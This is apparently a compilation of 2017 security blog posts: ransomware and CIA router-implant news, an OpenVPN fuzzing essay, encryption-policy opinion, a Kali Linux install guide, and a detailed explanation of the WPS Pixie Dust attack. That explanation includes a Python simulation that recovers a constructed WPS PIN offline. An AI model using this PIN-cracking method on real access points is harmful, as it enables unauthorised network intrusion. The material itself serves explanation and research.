Cyber attack hits CHERNOBYL radiation system: ‘Goldeneye’ ransomware strikes

Chernobyl’s radiation monitoring system has been hit by the attack, with its sensors shut down, while UK advertising giant WPP, the largest agency in the world, is among dozens of firms affected.

The ransomware appears to have been spread through popular accounting software and specifically targeted at bringing down business IT systems.

The outage began in Ukraine as the country’s power grid, airport, national bank and communications firms were first to report problems, before it spread rapidly throughout Europe.

Companies in the US, Germany, Norway, Russia, Denmark and France are among those to have confirmed issues so far.

Users are being shown a message saying their data has been encrypted, with some asking for £300 in the anonymous currency Bitcoin to retrieve it.

More than 200,000 victims in 150 countries were infected by WannaCry, which originated in the UK and Spain last month, before spreading globally.

But cyber security experts have warned that this time the virus is much more dangerous because it has no ‘kill switch’ and is designed to spread rapidly through networks.

Marcus Hutchins, who foiled the previous WannaCry attack by discovering a way to stop it from infecting new computers, told MailOnline that even if users pay the fee their files could now be lost forever.

He said: ‘The company that hosts the email account which the ransomware asks you to contact has closed the account. There’s no way to get files back.

‘It’s early days – we don’t know if we can find a fix yet. But if it’s decryptable we will find a way.’

Hutchins, 22, continued: ‘Everyone’s looking at this right now and I’m working with other researchers.

‘I was just praying it wasn’t the WannaCry exploit again. Ideally we’ll have to find a way to decrypt the files or else people are not going to get them back.’

The ransomware targets computers using the Windows XP operating system which have not installed the latest security updates released by Microsoft.

KALI Linux – Promiscuous Mode – Wireless hacking


Six Modes of Wireless

  • Monitor
  • Managed
  • Ad hoc
  • Master
  • Mesh
  • Repeater

A Cyberattack ‘the World Isn’t Ready For’

Reference: NYTIMES

Qubes OS – Privacy

The OpenVPN post-audit bug bonanza

I love OpenVPN, and wish them the best of luck in resolving these issues.



I’ve discovered 4 important security vulnerabilities in OpenVPN. Interestingly, these were not found by the two recently completed audits of OpenVPN code. Below you’ll find mostly technical information about the vulnerabilities and about how I found them, but also some commentary on why commissioning code audits isn’t always the best way to find vulnerabilities.

Here you can find the latest version of OpenVPN:

This was a labor of love. Nobody paid me to do this. If you appreciate this effort, please donate BTC to 1D5vYkiLwRptKP1LCnt4V1TPUgk7cxvVtg.


After a hardening of the OpenVPN code (as commissioned by the Dutch intelligence service AIVD) and two recent audits [1] [2], I thought it was now time for some real action ;).

Most of these issues were found through fuzzing. I hate admitting it, but my chops in the arcane art of reviewing code manually, acquired through grueling practice, are dwarfed by the fuzzer in one fell swoop; the mortal’s mind can only retain and comprehend so much information at a time, and for programs that perform long cycles of complex, deeply nested operations it is simply not feasible to expect a human to perform an encompassing and reliable verification.

End users and companies who want to invest in validating the security of an application written in an “unsafe” language like C, such as those who crowd-funded the OpenVPN audit, should not request a manual source code audit, but rather task the experts with the goal of ensuring intended operation and finding vulnerabilities, using the strategy that provides the optimal yield for a given funding window.

Upon first thought you’d assume both endeavors boil down to the same thing, but my fuzzing-based strategy is evidently more effective. What’s more, once a set of fuzzers has been written, these can be integrated into a continuous integration environment for permanent protection henceforth, whereas a code review only provides a “snapshot” security assessment of a particular software version.

Manual reviews may still be part of the effort, but only where automation (fuzzing) is not adequate. Some examples:

  • verify cryptographic operations
  • other application-level logic, like path traversal (though a fuzzer may help if you’re clever)
  • determine the extent to which timing discrepancies divulge sensitive information
  • determine the extent to which size of (encrypted) transmitted data divulges sensitive information (see also). Beyond the sphere of cryptanalysis, I think this is an underappreciated way of looking at security.
  • applications that contain a lot of pointer comparisons (not a very good practice to begin with — OpenVPN is very clean in this regard, by the way) may require manual inspection to see if behavior relies on pointer values (example)
  • can memory leaks (which may be considered a vulnerability themselves) lead to more severe vulnerabilities? (eg. will memory corruption take place if the system is drained of memory?)
  • can very large inputs (say megabytes, gigabytes, which would be very slow to fuzz) cause problems?
  • does the software rely on the behavior of certain library versions/flavors? (eg. a libc function that behaves a certain way with glibc may behave differently with the BSD libc — I’ve tried making a case around the use of ctime() in OpenVPN)

So doing a code audit to find memory vulnerabilities in a C program is a little like asking car wash employees to clean your car with a makeup brush. A very noble pursuit indeed, and if you manage to complete it, the overall results may be even better than automated water blasting, but unless you have infinite funds and time, resources are better spent on cleaning the exterior with a machine, vacuuming the interior followed by an evaluation of the overall cleanliness, and acting where necessary.


The CIA has been hacking dozens of Wi-Fi routers and using them as covert listening points for at least a DECADE, leaked documents reveal

Leaked CIA documents have revealed the agency has been hacking people’s Wi-Fi routers and using them as covert listening points.

Infected routers are used to spy on the activity of internet-connected devices, according to decade-old secret documents leaked on Thursday by Wikileaks.

Home routers from 10 US manufacturers, including Linksys, D-Link, and Belkin, have been used by the CIA to monitor internet traffic.

Wikileaks released the entire 175-page CIA user manual for the implant, which is codenamed ‘CherryBlossom’.


In total, the manual says that the firmware runs on 25 router models, but could run on more than 100 with minor modifications.


‘The Cherry Blossom (CB) system provides a means of monitoring the internet activity of and performing software exploits on targets of interest,’ the document reads.

‘In particular, CB is focused on compromising wireless networking devices, such as wireless (802.11) routers and access points (APs), to achieve these goals.’

The firmware is especially effective against some D-Link-made DIR-130 and Linksys-manufactured WRT300N models because they can be remotely infected even if they have a strong administrator password.

An exploit codenamed ‘tomato’ can extract passwords from these routers if a default feature known as universal plug and play is left on.

Mission tasks include copying some or all of the user’s internet traffic, email exchanges and private chat usernames.

All exchanges between the Flytrap device and the CIA’s CherryTree server are encrypted and cryptographically authenticated.

The documents date back to 2007, meaning the agency has been using the Wi-Fi hack for at least a decade.


PRIVACY: Data leads to Social Cooling

If you feel you are being watched, you change your behavior.

Big Data is supercharging this effect.


People are starting to realize that this ‘digital reputation’ could limit their opportunities.

(And that these algorithms are often biased, and built on poor data.)

People are changing their behavior to get better scores.

This has good and bad sides.

Social Cooling describes the long-term negative side effects of living in a reputation economy:

Theresa May’s repeated calls to ban encryption still won’t work

In the wake of Saturday’s terrorist attack in London, the Prime Minister Theresa May has again called for new laws to regulate the internet, demanding that internet companies do more to stamp out spaces where terrorists can communicate freely.

The arguments against banning encryption are well rehearsed, but worth repeating. Encryption is not just a tool used by terrorists. Anyone who uses the internet uses encryption. Messaging apps, online banking, e-commerce, government websites, or your local hospital all use encryption.

A ban on encryption would make it impossible to do anything online that relies on keeping things private, like sending your credit card details or messaging your doctor.

Even if governments were willing to sacrifice their citizens’ online privacy, any sort of ban would be futile anyway. Anyone with a little technical know-how could write their own code to encrypt and decrypt data. In fact, the code to do so is so small it easily fits on a t-shirt.

Another way to get rid of May’s “safe spaces” that has been mooted is to give security services special access to encrypted messages, so-called back doors. Again this is impractical.

If a “master key” was created that allowed security services to bypass encryption it would immediately become a target for hackers. Anyone feeling hostile could focus their efforts on cracking the master key, and in doing so would not just get access to one person’s data, but everyone’s.

Last month New Scientist called for a greater understanding of technology among politicians.


Thoughts. The New Scientist has rightly called for a greater understanding amongst politicians.

What Theresa May is actually saying is:

  1. We ban internet banking (as that relies on encryption for security).
  2. We ban internet shopping (as Amazon relies on encryption too).
  3. We ban, basically, all transactions on the Internet.

Do you agree with her?

The Internet and Encryption go hand in hand; you cannot use one safely without the other. I don’t see where she’s going with this argument, as it is a non-starter.

However, it does show her lack of understanding of how the Internet relies upon encryption to function.


KALI – How to hack WIFI – WPS Pixie Dust Attack

WPS Pixie Dust Attack

A bit of background first. The Pixie Dust Attack is a WPS attack aimed to crack the PIN offline, exploiting the non-existing or low entropy of some APs. This vulnerability was discovered by Dominique Bongard. All credits for the research go to him.


The roles of the devices in a common WPS transaction are:
– Registrar: client/attacker
– Enrollee: access point

Let’s have a look at part of the information exchanged between the two (|| means concatenation):
– Enrollee -> Registrar: M1 (E-Nonce || description || PKE)
– Registrar -> Enrollee: M2 (E-Nonce || R-Nonce || description || PKR)
– Enrollee -> Registrar: M3 (R-Nonce || E-Hash1 || E-Hash2)

PKE: Public Key Enrollee (g^A mod p)
PKR: Public Key Registrar (g^B mod p)
E-Nonce: Enrollee Nonce
R-Nonce: Registrar Nonce

And now comes the interesting part:
– E-Hash1: HMAC{AuthKey}(ES-1 || PSK1 || PKE || PKR)
– E-Hash2: HMAC{AuthKey}(ES-2 || PSK2 || PKE || PKR)

PSK1 is a truncated hash of the first 4 digits of the WPS pin
PSK2 is a truncated hash of the last 4 digits of the WPS pin

In the M3 packet the AP proves to us that it knows the first half of the PIN (with E-Hash1) and the second half (with E-Hash2). Of those two hashes we know everything except PSK1 and ES-1, and PSK2 and ES-2, respectively.
– PSK1 and PSK2 need only 10,000 + 1,000 guesses to find (if the last digit is used as a checksum, or 20,000 if not).
– ES-1 and ES-2 are two 128-bit random nonces, which would be impossible to bruteforce, right?

The question now is how are they generated? Are they truly random? No, not for every AP/manufacturer at least. Bongard looked at two implementations: Ralink and Broadcom.
– The former uses ES-1 = ES-2 = 0 (constant) so we just need to bruteforce the PIN with 11000 guesses.
– The latter has the code of its random function publicly hosted online on GitHub (lol). It will work only for some old devices, though (probably those shipped from 2011 – 2013).

It uses the r_rand() function from C (which is not secure), a Linear Congruential Generator with an entropy of only 25 bits (instant to bruteforce).
ES-1 is calculated after the E-Nonce, so you just need to guess the seed (25 bits of entropy) until you find the sequence that leads to the E-Nonce. That’s it.

Aside from those two manufacturers, it is also important to mention that the majority of APs (if not all) use 32-bit pseudo-random number generators and have low entropy at boot. So more vulnerabilities are out there, just waiting to be discovered by someone.
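As an added illustration (not from the original post and not pixiewps code), the following Python models the M3 commitment described above, E-Hash1 = HMAC_AuthKey(ES-1 || PSK1 || PKE || PKR), with HMAC-SHA-256 and the 128-bit truncation of PSK1 taken from the WPS spec; AuthKey, PKE and PKR are constructed random placeholders (no real Diffie-Hellman is run). It shows why a constant ES-1 = ES-2 = 0 lets both hashes be opened offline in 10,000 + 1,000 guesses, while the same search against proper 128-bit random nonces finds nothing.

```python
import hashlib
import hmac
import secrets

def wps_checksum_digit(first7: str) -> str:
    """The 8th PIN digit is a checksum over the first seven (WPS spec)."""
    d = [int(c) for c in first7]
    acc = 3 * (d[0] + d[2] + d[4] + d[6]) + (d[1] + d[3] + d[5])
    return str((10 - acc % 10) % 10)

def psk_half(auth_key: bytes, pin_half: str) -> bytes:
    """PSK1/PSK2: HMAC-SHA-256 over four ASCII PIN digits, truncated to 128 bits."""
    return hmac.new(auth_key, pin_half.encode(), hashlib.sha256).digest()[:16]

def e_hash(auth_key: bytes, es: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    """E-Hash1/E-Hash2 = HMAC_AuthKey(ES || PSK || PKE || PKR), as sent in M3."""
    return hmac.new(auth_key, es + psk + pke + pkr, hashlib.sha256).digest()

def open_commitment(auth_key, observed, es_guess, pke, pkr, first_half=None):
    """Offline search for the PIN half behind one E-Hash, given a guess for ES.
    First half: 10,000 candidates. Second half: the last digit is a checksum,
    so 1,000 candidates once the first half is known. None if ES guess is wrong."""
    if first_half is None:
        cands = (f"{n:04d}" for n in range(10_000))
    else:
        cands = (f"{n:03d}" + wps_checksum_digit(first_half + f"{n:03d}") for n in range(1000))
    for cand in cands:
        h = e_hash(auth_key, es_guess, psk_half(auth_key, cand), pke, pkr)
        if hmac.compare_digest(h, observed):
            return cand
    return None

def simulate(constant_es: bool) -> tuple:
    """Run one enrollee M3 with zero (Ralink-style) or random 128-bit ES nonces,
    then attempt the offline search assuming ES = 0. AuthKey, PKE and PKR are
    constructed random placeholders; the constructed PIN is 12345670."""
    auth_key = secrets.token_bytes(32)
    pke, pkr = secrets.token_bytes(192), secrets.token_bytes(192)
    pin = "1234567" + wps_checksum_digit("1234567")
    if constant_es:
        es1 = es2 = bytes(16)                       # ES-1 = ES-2 = 0
    else:
        es1, es2 = secrets.token_bytes(16), secrets.token_bytes(16)
    eh1 = e_hash(auth_key, es1, psk_half(auth_key, pin[:4]), pke, pkr)
    eh2 = e_hash(auth_key, es2, psk_half(auth_key, pin[4:]), pke, pkr)
    half1 = open_commitment(auth_key, eh1, bytes(16), pke, pkr)
    half2 = open_commitment(auth_key, eh2, bytes(16), pke, pkr, half1) if half1 else None
    return half1, half2   # ("1234", "5670") with constant ES; (None, None) otherwise
```

The hiding property of the commitment rests entirely on the entropy of ES-1/ES-2, which is why the fix on the AP side is a properly seeded CSPRNG rather than any change to the hash itself.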

Now let’s talk about the tool, pixiewps.


KALI Linux – How to install KALI LINUX using VirtualBox – on Windows 10

Installing Kali Linux on your Windows 10 laptop is easy, if we use VirtualBox.


Step 1 – Download VirtualBox for Windows

Run > as Admin

Installer starts > Next > Next (just accept all the defaults)

Warning > Yes

Install > Finish

VirtualBox Opens


Step 2 – Download a VirtualBox Kali image

These images have a default password of “toor” and may have pre-generated SSH host keys.

Select Kali Linux 64 bit VBOX

You’ll see the *.ova file appear in your downloads.

Step 3 – Import Kali Image

File > Import

Browse to the Kali Image > Next

Next, the settings will appear > Import

Kali Imported

Press the START arrow to launch Kali.

USB Error – we need the extension pack – for USB 2.0 and 3.0 devices.

Download VirtualBox Extension Pack

Run and Install Extension Pack > I agree

Installed successfully > OK


Now, let’s try the “START” arrow again.

Kali launches a login prompt – remember the password

Username = root

Password = toor

Kali Splashscreen – Yay!


Step 4 – Update the Kali Image

Open a shell and run the package update commands to refresh the repositories.

That’s it.

You have Kali Linux 2017.1 installed.